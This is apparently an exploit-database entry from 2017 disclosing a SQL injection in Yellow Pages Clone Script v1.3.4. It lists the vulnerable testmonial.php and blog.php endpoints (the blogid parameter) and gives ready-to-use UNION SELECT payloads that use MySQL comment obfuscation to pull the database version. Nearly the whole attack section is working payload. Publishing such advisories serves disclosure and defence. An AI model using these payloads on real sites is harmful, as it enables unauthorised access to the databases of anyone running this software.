21 lines
No EOL
857 B
Text
21 lines
No EOL
857 B
Text
# # # # #
|
|
# Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 06.03.2017
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
|
|
# Demo: http://dexteritysolution.com/demo/directory/
|
|
# Version: 1.3.4
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/testmonial.php?blogid=[SQL]
|
|
# -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
|
|
# http://localhost/[PATH]/blog.php?blogid=[SQL]
|
|
# -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
|
|
# Etc...
|
|
# # # # # |